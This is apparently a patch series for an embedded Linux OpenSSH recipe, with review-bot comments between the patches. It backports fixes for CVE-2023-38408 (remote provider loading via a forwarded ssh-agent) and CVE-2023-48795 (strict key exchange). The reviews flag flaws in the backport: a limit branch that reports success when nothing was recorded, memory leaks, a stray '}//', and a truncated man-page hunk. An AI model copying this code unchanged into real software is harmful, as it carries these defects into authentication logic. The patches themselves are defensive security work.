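+ int r, ok = -1;
+- char *fp = NULL;
+- struct sshbuf *msg = NULL, *data = NULL;
++ char *fp = NULL, *user = NULL, *sig_dest = NULL;
++ struct sshbuf *msg = NULL, *data = NULL, *sid = NULL;
+ struct sshkey *key = NULL;
+ struct identity *id;
+ struct notifier_ctx *notifier = NULL;
+@@ -452,7 +485,33 @@ process_sign_request2(SocketEntry *e)
+ verbose("%s: %s key not found", __func__, sshkey_type(key));
+ goto send;
+ }
+- if (id->confirm && confirm_key(id, NULL) != 0) {
++ /*
++ * If session IDs were recorded for this socket, then use them to
++ * annotate the confirmation messages with the host keys.
++ */
++ if (e->nsession_ids > 0 &&
++ parse_userauth_request(data, key, &user, &sid) == 0) {
++ /*
++ * session ID from userauth request should match the final
++ * ID in the list recorded in the socket, unless the ssh
++ * client at that point lacks the binding extension (or if
++ * an attacker is trying to steal use of the agent).
++ */
++ i = e->nsession_ids - 1;
++ if (buf_equal(sid, e->session_ids[i].sid) == 0) {
++ if ((fp = sshkey_fingerprint(e->session_ids[i].key,
++ SSH_FP_HASH_DEFAULT, SSH_FP_DEFAULT)) == NULL)
++ fatal("%s: fingerprint failed", __func__);
++ debug3("%s: destination %s %s (slot %zu)", __func__,
++ sshkey_type(e->session_ids[i].key), fp, i);
++ xasprintf(&sig_dest, "public key request for "
++ "target user \"%s\" to %s %s", user,
++ sshkey_type(e->session_ids[i].key), fp);
++ free(fp);
++ fp = NULL;
++ }
++ }//
++ if (id->confirm && confirm_key(id, sig_dest) != 0) {
+ verbose("%s: user refused key", __func__);
+ goto send;
+ }
+@@ -467,8 +526,10 @@ process_sign_request2(SocketEntry *e)
+ SSH_FP_DEFAULT)) == NULL)
+ fatal("%s: fingerprint failed", __func__);
+ notifier = notify_start(0,
+- "Confirm user presence for key %s %s",
+- sshkey_type(id->key), fp);
++ "Confirm user presence for key %s %s%s%s",
++ sshkey_type(id->key), fp,
++ sig_dest == NULL ? "" : "\n",
++ sig_dest == NULL ? "" : sig_dest);
+ }
+ }
+ if ((r = sshkey_sign(id->key, &signature, &slen,
+@@ -492,11 +553,14 @@ process_sign_request2(SocketEntry *e)
+ if ((r = sshbuf_put_stringb(e->output, msg)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+
++ sshbuf_free(sid);
+ sshbuf_free(data);
+ sshbuf_free(msg);
+ sshkey_free(key);
+ free(fp);
+ free(signature);
++ free(sig_dest);
++ free(user);
+ }
+
+ /* shared */
+@@ -925,6 +989,98 @@ send:
+ }
+ #endif /* ENABLE_PKCS11 */
+
++static int
++process_ext_session_bind(SocketEntry *e)
++{
++ int r, sid_match, key_match;
++ struct sshkey *key = NULL;
++ struct sshbuf *sid = NULL, *sig = NULL;
++ char *fp = NULL;
++ u_char fwd;
++ size_t i;
++
++ debug2("%s: entering", __func__);
++ if ((r = sshkey_froms(e->request, &key)) != 0 ||
++ (r = sshbuf_froms(e->request, &sid)) != 0 ||
++ (r = sshbuf_froms(e->request, &sig)) != 0 ||
++ (r = sshbuf_get_u8(e->request, &fwd)) != 0) {
++ error("%s: parse: %s", __func__, ssh_err(r));
++ goto out;
++ }
++ if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
++ SSH_FP_DEFAULT)) == NULL)
++ fatal("%s: fingerprint failed", __func__);
++ /* check signature with hostkey on session ID */
++ if ((r = sshkey_verify(key, sshbuf_ptr(sig), sshbuf_len(sig),
++ sshbuf_ptr(sid), sshbuf_len(sid), NULL, 0, NULL)) != 0) {
++ error("%s: sshkey_verify for %s %s: %s", __func__, sshkey_type(key), fp, ssh_err(r));
++ goto out;
++ }
++ /* check whether sid/key already recorded */
++ for (i = 0; i < e->nsession_ids; i++) {
++ sid_match = buf_equal(sid, e->session_ids[i].sid) == 0;
++ key_match = sshkey_equal(key, e->session_ids[i].key);
++ if (sid_match && key_match) {
++ debug("%s: session ID already recorded for %s %s", __func__,
++ sshkey_type(key), fp);
++ r = 0;
++ goto out;
++ } else if (sid_match) {
++ error("%s: session ID recorded against different key "
++ "for %s %s", __func__, sshkey_type(key), fp);
++ r = -1;
++ goto out;
++ }
++ /*
++ * new sid with previously-seen key can happen, e.g. multiple
++ * connections to the same host.
++ */
++ }
++ /* record new key/sid */
++ if (e->nsession_ids >= AGENT_MAX_SESSION_IDS) {
++ error("%s: too many session IDs recorded", __func__);
++ goto out;
++ }
++ e->session_ids = xrecallocarray(e->session_ids, e->nsession_ids,
++ e->nsession_ids + 1, sizeof(*e->session_ids));
++ i = e->nsession_ids++;
++ debug("%s: recorded %s %s (slot %zu of %d)", __func__, sshkey_type(key), fp, i,
++ AGENT_MAX_SESSION_IDS);
++ e->session_ids[i].key = key;
++ e->session_ids[i].forwarded = fwd != 0;
++ key = NULL; /* transferred */
++ /* can't transfer sid; it's refcounted and scoped to request's life */
++ if ((e->session_ids[i].sid = sshbuf_new()) == NULL)
++ fatal("%s: sshbuf_new", __func__);
++ if ((r = sshbuf_putb(e->session_ids[i].sid, sid)) != 0)
++ fatal("%s: sshbuf_putb session ID: %s", __func__, ssh_err(r));
++ /* success */
++ r = 0;
++ out:
++ sshkey_free(key);
++ sshbuf_free(sid);
++ sshbuf_free(sig);
++ return r == 0 ? 1 : 0;
++}
++
++static void
++process_extension(SocketEntry *e)
++{
++ int r, success = 0;
++ char *name;
++
++ debug2("%s: entering", __func__);
++ if ((r = sshbuf_get_cstring(e->request, &name, NULL)) != 0) {
++ error("%s: parse: %s", __func__, ssh_err(r));
++ goto send;
++ }
++ if (strcmp(name, "session-bind@openssh.com") == 0)
++ success = process_ext_session_bind(e);
++ else
++ debug("%s: unsupported extension \"%s\"", __func__, name);
++send:
++ send_status(e, success);
++}
+ /*
+ * dispatch incoming message.
+ * returns 1 on success, 0 for incomplete messages or -1 on error.
+@@ -1019,6 +1175,9 @@ process_message(u_int socknum)
+ process_remove_smartcard_key(e);
+ break;
+ #endif /* ENABLE_PKCS11 */
++ case SSH_AGENTC_EXTENSION:
++ process_extension(e);
++ break;
+ default:
+ /* Unknown message. Respond with failure. */
+ error("Unknown message %d", type);
+--
+2.41.0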
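Review bot: In the added `process_ext_session_bind()`, the `AGENT_MAX_SESSION_IDS` limit branch jumps to `out` while `r` is still 0 from the successful `sshkey_verify()`, so the function returns 1 and the client is told the bind succeeded although nothing was recorded; set `r = -1;` before that `goto out;`. The same function never frees `fp`, and `process_extension()` never frees `name`, so each extension request leaks a small allocation in a long-lived agent; add `free(fp);` under `out:` and `free(name);` just before the `send:` label. The stray `}//` closing the session-ID annotation block in `process_sign_request2()` looks like a backport leftover and should be a plain `}`.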
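--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch
@@ -0,0 +1,120 @@
+From 4fe3d0fbd3d6dc1f19354e0d73a3231c461ed044 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 13:56:33 +0000
+Subject: [PATCH 12/12] upstream: Disallow remote addition of FIDO/PKCS11
+ provider libraries to ssh-agent by default.
+
+The old behaviour of allowing remote clients from loading providers
+can be restored using `ssh-agent -O allow-remote-pkcs11`.
+
+Detection of local/remote clients requires a ssh(1) that supports
+the `session-bind@openssh.com` extension. Forwarding access to a
+ssh-agent socket using non-OpenSSH tools may circumvent this control.
+
+ok markus@
+
+OpenBSD-Commit-ID: 4c2bdf79b214ae7e60cc8c39a45501344fa7bd7c
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1f2731f5d7a8f8a8385c6031667ed29072c0d92a]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.1 | 20 ++++++++++++++++++++
+ ssh-agent.c | 26 ++++++++++++++++++++++++--
+ 2 files changed, 44 insertions(+), 2 deletions(-)
+
+diff --git a/ssh-agent.1 b/ssh-agent.1
+index fff0db6..a0f1e21 100644
+--- a/ssh-agent.1
++++ b/ssh-agent.1
+@@ -97,6 +97,26 @@ The default is
+ Kill the current agent (given by the
+ .Ev SSH_AGENT_PID
+ environment variable).
++Currently two options are supported:
++.Cm allow-remote-pkcs11
++and
++.Pp
++The
++.Cm allow-remote-pkcs11
++option allows clients of a forwarded
++.Nm
++to load PKCS#11 or FIDO provider libraries.
++By default only local clients may perform this operation.
++Note that signalling that a
++.Nm
++client remote is performed by
++.Xr ssh 1 ,
++and use of other tools to forward access to the agent socket may circumvent
++this restriction.
++.Pp
++The
++.Cm no-restrict-websafe ,
++instructs
+ .It Fl P Ar provider_whitelist
+ Specify a pattern-list of acceptable paths for PKCS#11 and FIDO authenticator
+ shared libraries that may be used with the
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 01c7f2b..40c1b6b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.280 2021/12/19 22:09:23 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.300 2023/07/19 13:56:33 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -167,6 +167,12 @@ char socket_dir[PATH_MAX];
+ /* PKCS#11/Security key path whitelist */
+ static char *provider_whitelist;
+
++/*
++ * Allows PKCS11 providers or SK keys that use non-internal providers to
++ * be added over a remote connection (identified by session-bind@openssh.com).
++ */
++static int remote_add_provider;
++
+ /* locking */
+ #define LOCK_SIZE 32
+ #define LOCK_SALT_SIZE 16
+@@ -736,6 +742,15 @@ process_add_identity(SocketEntry *e)
+ if (strcasecmp(sk_provider, "internal") == 0) {
+ debug("%s: internal provider", __func__);
+ } else {
++ if (e->nsession_ids != 0 && !remote_add_provider) {
++ verbose("failed add of SK provider \"%.100s\": "
++ "remote addition of providers is disabled",
++ sk_provider);
++ free(sk_provider);
++ free(comment);
++ sshkey_free(k);
++ goto send;
++ }
+ if (realpath(sk_provider, canonical_provider) == NULL) {
+ verbose("failed provider \"%.100s\": "
+ "realpath: %s", sk_provider,
+@@ -901,6 +916,11 @@ process_add_smartcard_key(SocketEntry *e)
+ goto send;
+ }
+ }
++ if (e->nsession_ids != 0 && !remote_add_provider) {
++ verbose("failed PKCS#11 add of \"%.100s\": remote addition of "
++ "providers is disabled", provider);
++ goto send;
++ }
+ if (realpath(provider, canonical_provider) == NULL) {
+ verbose("failed PKCS#11 add of \"%.100s\": realpath: %s",
+ provider, strerror(errno));
+@@ -1556,7 +1576,9 @@ main(int ac, char **av)
+ break;
+ case 'O':
+ if (strcmp(optarg, "no-restrict-websafe") == 0)
+- restrict_websafe = 0;
++ restrict_websafe = 0;
++ else if (strcmp(optarg, "allow-remote-pkcs11") == 0)
++ remote_add_provider = 1;
+ else
+ fatal("Unknown -O option");
+ break;
+--
+2.41.0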
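Review bot: The new guards in `process_add_identity()` and `process_add_smartcard_key()` treat a connection as remote only when `e->nsession_ids != 0`, that is, only after the client has sent `session-bind@openssh.com`; the patch description itself says detection needs an ssh(1) that supports that extension. Patch 11/12 adds the agent side of the binding, and the earlier patches of the series are outside this view, so please confirm the packaged ssh(1) actually sends the bind when forwarding the agent, otherwise the default-deny never triggers for forwarded sockets. A short comment at the first check would make the assumption explicit, e.g. `/* nsession_ids != 0: peer sent session-bind@openssh.com, treat as forwarded */`. Separately, the `ssh-agent.1` hunk lands under the `-k` entry with no `.It Fl O` item header and its sentences are cut off (`and` directly followed by `.Pp`, and a trailing `instructs`), so the `allow-remote-pkcs11` option is not documented as intended.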
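--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch
@@ -0,0 +1,468 @@
+(modified to not remove ssh_packet_read_expect(), to add to
+KexAlgorithms in sshd.c and sshconnect2.c as this version pre-dates
+kex_proposal_populate_entries(), replace debug*_f() with debug*(),
+error*_f() with error*(), and fatal_f() with fatal())
+
+Backport of:
+
+From 1edb00c58f8a6875fad6a497aa2bacf37f9e6cd5 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Mon, 18 Dec 2023 14:45:17 +0000
+Subject: [PATCH] upstream: implement "strict key exchange" in ssh and sshd
+
+This adds a protocol extension to improve the integrity of the SSH
+transport protocol, particular in and around the initial key exchange
+(KEX) phase.
+
+Full details of the extension are in the PROTOCOL file.
+
+with markus@
+
+OpenBSD-Commit-ID: 2a66ac962f0a630d7945fee54004ed9e9c439f14
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/openssh/tree/debian/patches/CVE-2023-48795.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/openssh/openssh-portable/commit/1edb00c58f8a6875fad6a497aa2bacf37f9e6cd5]
+CVE: CVE-2023-48795
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ PROTOCOL | 26 +++++++++++++++++
+ kex.c | 68 +++++++++++++++++++++++++++++++++-----------
+ kex.h | 1 +
+ packet.c | 78 ++++++++++++++++++++++++++++++++++++++-------------
+ sshconnect2.c | 14 +++------
+ sshd.c | 7 +++--
+ 6 files changed, 146 insertions(+), 48 deletions(-)
+
+diff --git a/PROTOCOL b/PROTOCOL
+index f75c1c0..89bddfe 100644
+--- a/PROTOCOL
++++ b/PROTOCOL
+@@ -102,6 +102,32 @@ OpenSSH supports the use of ECDH in Curve25519 for key exchange as
+ described at:
+ http://git.libssh.org/users/aris/libssh.git/plain/doc/curve25519-sha256@libssh.org.txt?h=curve25519
+
++1.9 transport: strict key exchange extension
++
++OpenSSH supports a number of transport-layer hardening measures under
++a "strict KEX" feature. This feature is signalled similarly to the
++RFC8308 ext-info feature: by including a additional algorithm in the
++initiial SSH2_MSG_KEXINIT kex_algorithms field. The client may append
++"kex-strict-c-v00@openssh.com" to its kex_algorithms and the server
++may append "kex-strict-s-v00@openssh.com". These pseudo-algorithms
++are only valid in the initial SSH2_MSG_KEXINIT and MUST be ignored
++if they are present in subsequent SSH2_MSG_KEXINIT packets.
++
++When an endpoint that supports this extension observes this algorithm
++name in a peer's KEXINIT packet, it MUST make the following changes to
++the the protocol:
++
++a) During initial KEX, terminate the connection if any unexpected or
++ out-of-sequence packet is received. This includes terminating the
++ connection if the first packet received is not SSH2_MSG_KEXINIT.
++ Unexpected packets for the purpose of strict KEX include messages
++ that are otherwise valid at any time during the connection such as
++ SSH2_MSG_DEBUG and SSH2_MSG_IGNORE.
++b) After sending or receiving a SSH2_MSG_NEWKEYS message, reset the
++ packet sequence number to zero. This behaviour persists for the
++ duration of the connection (i.e. not just the first
++ SSH2_MSG_NEWKEYS).
++
+ 2. Connection protocol changes
+
+ 2.1. connection: Channel write close extension "eow@openssh.com"
+diff --git a/kex.c b/kex.c
+index ce85f04..3129a4e 100644
+--- a/kex.c
++++ b/kex.c
+@@ -63,7 +63,7 @@
+ #include "digest.h"
+
+ /* prototype */
+-static int kex_choose_conf(struct ssh *);
++static int kex_choose_conf(struct ssh *, uint32_t seq);
+ static int kex_input_newkeys(int, u_int32_t, struct ssh *);
+
+ static const char *proposal_names[PROPOSAL_MAX] = {
+@@ -173,6 +173,18 @@ kex_names_valid(const char *names)
+ return 1;
+ }
+
++/* returns non-zero if proposal contains any algorithm from algs */
++static int
++has_any_alg(const char *proposal, const char *algs)
++{
++ char *cp;
++
++ if ((cp = match_list(proposal, algs, NULL)) == NULL)
++ return 0;
++ free(cp);
++ return 1;
++}
++
+ /*
+ * Concatenate algorithm names, avoiding duplicates in the process.
+ * Caller must free returned string.
+@@ -180,7 +192,7 @@ kex_names_valid(const char *names)
+ char *
+ kex_names_cat(const char *a, const char *b)
+ {
+- char *ret = NULL, *tmp = NULL, *cp, *p, *m;
++ char *ret = NULL, *tmp = NULL, *cp, *p;
+ size_t len;
+
+ if (a == NULL || *a == '\0')
+@@ -197,10 +209,8 @@ kex_names_cat(const char *a, const char *b)
+ }
+ strlcpy(ret, a, len);
+ for ((p = strsep(&cp, ",")); p && *p != '\0'; (p = strsep(&cp, ","))) {
+- if ((m = match_list(ret, p, NULL)) != NULL) {
+- free(m);
++ if (has_any_alg(ret, p))
+ continue; /* Algorithm already present */
+- }
+ if (strlcat(ret, ",", len) >= len ||
+ strlcat(ret, p, len) >= len) {
+ free(tmp);
+@@ -409,7 +419,12 @@ kex_protocol_error(int type, u_int32_t seq, struct ssh *ssh)
+ {
+ int r;
+
+- error("kex protocol error: type %d seq %u", type, seq);
++ /* If in strict mode, any unexpected message is an error */
++ if ((ssh->kex->flags & KEX_INITIAL) && ssh->kex->kex_strict) {
++ ssh_packet_disconnect(ssh, "strict KEX violation: "
++ "unexpected packet type %u (seqnr %u)", type, seq);
++ }
++ error("type %u seq %u", type, seq);
+ if ((r = sshpkt_start(ssh, SSH2_MSG_UNIMPLEMENTED)) != 0 ||
+ (r = sshpkt_put_u32(ssh, seq)) != 0 ||
+ (r = sshpkt_send(ssh)) != 0)
+@@ -481,6 +496,11 @@ kex_input_ext_info(int type, u_int32_t seq, struct ssh *ssh)
+ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, &kex_protocol_error);
+ if ((r = sshpkt_get_u32(ssh, &ninfo)) != 0)
+ return r;
++ if (ninfo >= 1024) {
++ error("SSH2_MSG_EXT_INFO with too many entries, expected "
++ "<=1024, received %u", ninfo);
++ return dispatch_protocol_error(type, seq, ssh);
++ }
+ for (i = 0; i < ninfo; i++) {
+ if ((r = sshpkt_get_cstring(ssh, &name, NULL)) != 0)
+ return r;
+@@ -581,7 +601,7 @@ kex_input_kexinit(int type, u_int32_t seq, struct ssh *ssh)
+ error("%s: no hex", __func__);
+ return SSH_ERR_INTERNAL_ERROR;
+ }
+- ssh_dispatch_set(ssh, SSH2_MSG_KEXINIT, NULL);
++ ssh_dispatch_set(ssh, SSH2_MSG_KEXINIT, &kex_protocol_error);
+ ptr = sshpkt_ptr(ssh, &dlen);
+ if ((r = sshbuf_put(kex->peer, ptr, dlen)) != 0)
+ return r;
+@@ -617,7 +637,7 @@ kex_input_kexinit(int type, u_int32_t seq, struct ssh *ssh)
+ if (!(kex->flags & KEX_INIT_SENT))
+ if ((r = kex_send_kexinit(ssh)) != 0)
+ return r;
+- if ((r = kex_choose_conf(ssh)) != 0)
++ if ((r = kex_choose_conf(ssh, seq)) != 0)
+ return r;
+
+ if (kex->kex_type < KEX_MAX && kex->kex[kex->kex_type] != NULL)
+@@ -880,7 +900,13 @@ proposals_match(char *my[PROPOSAL_MAX], char *peer[PROPOSAL_MAX])
+ }
+
+ static int
+-kex_choose_conf(struct ssh *ssh)
++kexalgs_contains(char **peer, const char *ext)
++{
++ return has_any_alg(peer[PROPOSAL_KEX_ALGS], ext);
++}
++
++static int
++kex_choose_conf(struct ssh *ssh, uint32_t seq)
+ {
+ struct kex *kex = ssh->kex;
+ struct newkeys *newkeys;
+@@ -905,13 +931,23 @@ kex_choose_conf(struct ssh *ssh)
+ sprop=peer;
+ }
+
+- /* Check whether client supports ext_info_c */
+- if (kex->server && (kex->flags & KEX_INITIAL)) {
+- char *ext;
+-
+- ext = match_list("ext-info-c", peer[PROPOSAL_KEX_ALGS], NULL);
+- kex->ext_info_c = (ext != NULL);
+- free(ext);
++ /* Check whether peer supports ext_info/kex_strict */
++ if ((kex->flags & KEX_INITIAL) != 0) {
++ if (kex->server) {
++ kex->ext_info_c = kexalgs_contains(peer, "ext-info-c");
++ kex->kex_strict = kexalgs_contains(peer,
++ "kex-strict-c-v00@openssh.com");
++ } else {
++ kex->kex_strict = kexalgs_contains(peer,
++ "kex-strict-s-v00@openssh.com");
++ }
++ if (kex->kex_strict) {
++ debug3("will use strict KEX ordering");
++ if (seq != 0)
++ ssh_packet_disconnect(ssh,
++ "strict KEX violation: "
++ "KEXINIT was not the first packet");
++ }
+ }
+
+ /* Algorithm Negotiation */
+diff --git a/kex.h b/kex.h
+index a5ae6ac..cae38f7 100644
+--- a/kex.h
++++ b/kex.h
+@@ -145,6 +145,7 @@ struct kex {
+ u_int kex_type;
+ char *server_sig_algs;
+ int ext_info_c;
++ int kex_strict;
+ struct sshbuf *my;
+ struct sshbuf *peer;
+ struct sshbuf *client_version;
+diff --git a/packet.c b/packet.c
+index 6d3e917..43139f9 100644
+--- a/packet.c
++++ b/packet.c
+@@ -1203,8 +1203,13 @@ ssh_packet_send2_wrapped(struct ssh *ssh)
+ sshbuf_dump(state->output, stderr);
+ #endif
+ /* increment sequence number for outgoing packets */
+- if (++state->p_send.seqnr == 0)
++ if (++state->p_send.seqnr == 0) {
++ if ((ssh->kex->flags & KEX_INITIAL) != 0) {
++ ssh_packet_disconnect(ssh, "outgoing sequence number "
++ "wrapped during initial key exchange");
++ }
+ logit("outgoing seqnr wraps around");
++ }
+ if (++state->p_send.packets == 0)
+ if (!(ssh->compat & SSH_BUG_NOREKEY))
+ return SSH_ERR_NEED_REKEY;
+@@ -1212,6 +1217,11 @@ ssh_packet_send2_wrapped(struct ssh *ssh)
+ state->p_send.bytes += len;
+ sshbuf_reset(state->outgoing_packet);
+
++ if (type == SSH2_MSG_NEWKEYS && ssh->kex->kex_strict) {
++ debug("resetting send seqnr %u", state->p_send.seqnr);
++ state->p_send.seqnr = 0;
++ }
++
+ if (type == SSH2_MSG_NEWKEYS)
+ r = ssh_set_newkeys(ssh, MODE_OUT);
+ else if (type == SSH2_MSG_USERAUTH_SUCCESS && state->server_side)
+@@ -1345,8 +1355,7 @@ ssh_packet_read_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ /* Stay in the loop until we have received a complete packet. */
+ for (;;) {
+ /* Try to read a packet from the buffer. */
+- r = ssh_packet_read_poll_seqnr(ssh, typep, seqnr_p);
+- if (r != 0)
++ if ((r = ssh_packet_read_poll_seqnr(ssh, typep, seqnr_p)) != 0)
+ break;
+ /* If we got a packet, return it. */
+ if (*typep != SSH_MSG_NONE)
+@@ -1633,10 +1642,16 @@ ssh_packet_read_poll2(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ if ((r = sshbuf_consume(state->input, mac->mac_len)) != 0)
+ goto out;
+ }
++
+ if (seqnr_p != NULL)
+ *seqnr_p = state->p_read.seqnr;
+- if (++state->p_read.seqnr == 0)
++ if (++state->p_read.seqnr == 0) {
++ if ((ssh->kex->flags & KEX_INITIAL) != 0) {
++ ssh_packet_disconnect(ssh, "incoming sequence number "
++ "wrapped during initial key exchange");
++ }
+ logit("incoming seqnr wraps around");
++ }
+ if (++state->p_read.packets == 0)
+ if (!(ssh->compat & SSH_BUG_NOREKEY))
+ return SSH_ERR_NEED_REKEY;
+@@ -1702,6 +1717,10 @@ ssh_packet_read_poll2(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ #endif
+ /* reset for next packet */
+ state->packlen = 0;
++ if (*typep == SSH2_MSG_NEWKEYS && ssh->kex->kex_strict) {
++ debug("resetting read seqnr %u", state->p_read.seqnr);
++ state->p_read.seqnr = 0;
++ }
+
+ /* do we need to rekey? */
+ if (ssh_packet_need_rekeying(ssh, 0)) {
+@@ -1726,10 +1745,39 @@ ssh_packet_read_poll_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ r = ssh_packet_read_poll2(ssh, typep, seqnr_p);
+ if (r != 0)
+ return r;
+- if (*typep) {
+- state->keep_alive_timeouts = 0;
+- DBG(debug("received packet type %d", *typep));
++ if (*typep == 0) {
++ /* no message ready */
++ return 0;
++ }
++ state->keep_alive_timeouts = 0;
++ DBG(debug("received packet type %d", *typep));
++
++ /* Always process disconnect messages */
++ if (*typep == SSH2_MSG_DISCONNECT) {
++ if ((r = sshpkt_get_u32(ssh, &reason)) != 0 ||
++ (r = sshpkt_get_string(ssh, &msg, NULL)) != 0)
++ return r;
++ /* Ignore normal client exit notifications */
++ do_log2(ssh->state->server_side &&
++ reason == SSH2_DISCONNECT_BY_APPLICATION ?
++ SYSLOG_LEVEL_INFO : SYSLOG_LEVEL_ERROR,
++ "Received disconnect from %s port %d:"
++ "%u: %.400s", ssh_remote_ipaddr(ssh),
++ ssh_remote_port(ssh), reason, msg);
++ free(msg);
++ return SSH_ERR_DISCONNECTED;
+ }
++
++ /*
++ * Do not implicitly handle any messages here during initial
++ * KEX when in strict mode. They will be need to be allowed
++ * explicitly by the KEX dispatch table or they will generate
++ * protocol errors.
++ */
++ if (ssh->kex != NULL &&
++ (ssh->kex->flags & KEX_INITIAL) && ssh->kex->kex_strict)
++ return 0;
++ /* Implicitly handle transport-level messages */
+ switch (*typep) {
+ case SSH2_MSG_IGNORE:
+ debug3("Received SSH2_MSG_IGNORE");
+@@ -1744,19 +1792,6 @@ ssh_packet_read_poll_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ debug("Remote: %.900s", msg);
+ free(msg);
+ break;
+- case SSH2_MSG_DISCONNECT:
+- if ((r = sshpkt_get_u32(ssh, &reason)) != 0 ||
+- (r = sshpkt_get_string(ssh, &msg, NULL)) != 0)
+- return r;
+- /* Ignore normal client exit notifications */
+- do_log2(ssh->state->server_side &&
+- reason == SSH2_DISCONNECT_BY_APPLICATION ?
+- SYSLOG_LEVEL_INFO : SYSLOG_LEVEL_ERROR,
+- "Received disconnect from %s port %d:"
+- "%u: %.400s", ssh_remote_ipaddr(ssh),
+- ssh_remote_port(ssh), reason, msg);
+- free(msg);
+- return SSH_ERR_DISCONNECTED;
+ case SSH2_MSG_UNIMPLEMENTED:
+ if ((r = sshpkt_get_u32(ssh, &seqnr)) != 0)
+ return r;
+@@ -2235,6 +2270,7 @@ kex_to_blob(struct sshbuf *m, struct kex *kex)
+ (r = sshbuf_put_u32(m, kex->hostkey_type)) != 0 ||
+ (r = sshbuf_put_u32(m, kex->hostkey_nid)) != 0 ||
+ (r = sshbuf_put_u32(m, kex->kex_type)) != 0 ||
++ (r = sshbuf_put_u32(m, kex->kex_strict)) != 0 ||
+ (r = sshbuf_put_stringb(m, kex->my)) != 0 ||
+ (r = sshbuf_put_stringb(m, kex->peer)) != 0 ||
+ (r = sshbuf_put_stringb(m, kex->client_version)) != 0 ||
+@@ -2397,6 +2433,7 @@ kex_from_blob(struct sshbuf *m, struct kex **kexp)
+ (r = sshbuf_get_u32(m, (u_int *)&kex->hostkey_type)) != 0 ||
+ (r = sshbuf_get_u32(m, (u_int *)&kex->hostkey_nid)) != 0 ||
+ (r = sshbuf_get_u32(m, &kex->kex_type)) != 0 ||
++ (r = sshbuf_get_u32(m, &kex->kex_strict)) != 0 ||
+ (r = sshbuf_get_stringb(m, kex->my)) != 0 ||
+ (r = sshbuf_get_stringb(m, kex->peer)) != 0 ||
+ (r = sshbuf_get_stringb(m, kex->client_version)) != 0 ||
+@@ -2724,6 +2761,7 @@ sshpkt_disconnect(struct ssh *ssh, const char *fmt,...)
+ vsnprintf(buf, sizeof(buf), fmt, args);
+ va_end(args);
+
++ debug2("sending SSH2_MSG_DISCONNECT: %s", buf);
+ if ((r = sshpkt_start(ssh, SSH2_MSG_DISCONNECT)) != 0 ||
+ (r = sshpkt_put_u32(ssh, SSH2_DISCONNECT_PROTOCOL_ERROR)) != 0 ||
+ (r = sshpkt_put_cstring(ssh, buf)) != 0 ||
+diff --git a/sshconnect2.c b/sshconnect2.c
+index 5df9477..617ed9f 100644
+--- a/sshconnect2.c
++++ b/sshconnect2.c
+@@ -218,7 +218,8 @@ ssh_kex2(struct ssh *ssh, char *host, struct sockaddr *hostaddr, u_short port)
+ fatal("%s: kex_assemble_namelist", __func__);
+ free(all_key);
+
+- if ((s = kex_names_cat(options.kex_algorithms, "ext-info-c")) == NULL)
++ if ((s = kex_names_cat(options.kex_algorithms,
++ "ext-info-c,kex-strict-c-v00@openssh.com")) == NULL)
+ fatal("%s: kex_names_cat", __func__);
+ myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(s);
+ myproposal[PROPOSAL_ENC_ALGS_CTOS] =
+@@ -343,7 +344,6 @@ struct cauthmethod {
+ };
+
+ static int input_userauth_service_accept(int, u_int32_t, struct ssh *);
+-static int input_userauth_ext_info(int, u_int32_t, struct ssh *);
+ static int input_userauth_success(int, u_int32_t, struct ssh *);
+ static int input_userauth_failure(int, u_int32_t, struct ssh *);
+ static int input_userauth_banner(int, u_int32_t, struct ssh *);
+@@ -460,7 +460,7 @@ ssh_userauth2(struct ssh *ssh, const char *local_user,
+
+ ssh->authctxt = &authctxt;
+ ssh_dispatch_init(ssh, &input_userauth_error);
+- ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, &input_userauth_ext_info);
++ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, kex_input_ext_info);
+ ssh_dispatch_set(ssh, SSH2_MSG_SERVICE_ACCEPT, &input_userauth_service_accept);
+ ssh_dispatch_run_fatal(ssh, DISPATCH_BLOCK, &authctxt.success); /* loop until success */
+ pubkey_cleanup(ssh);
+@@ -505,13 +505,6 @@ input_userauth_service_accept(int type, u_int32_t seq, struct ssh *ssh)
+ return r;
+ }
+
+-/* ARGSUSED */
+-static int
+-input_userauth_ext_info(int type, u_int32_t seqnr, struct ssh *ssh)
+-{
+- return kex_input_ext_info(type, seqnr, ssh);
+-}
+-
+ void
+ userauth(struct ssh *ssh, char *authlist)
+ {
+@@ -593,6 +586,7 @@ input_userauth_success(int type, u_int32_t seq, struct ssh *ssh)
+ free(authctxt->methoddata);
+ authctxt->methoddata = NULL;
+ authctxt->success = 1; /* break out */
++ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, dispatch_protocol_error);
+ return 0;
+ }
+
+diff --git a/sshd.c b/sshd.c
+index 60b2aaf..ffea38c 100644
+--- a/sshd.c
++++ b/sshd.c
+@@ -2323,11 +2323,13 @@ static void
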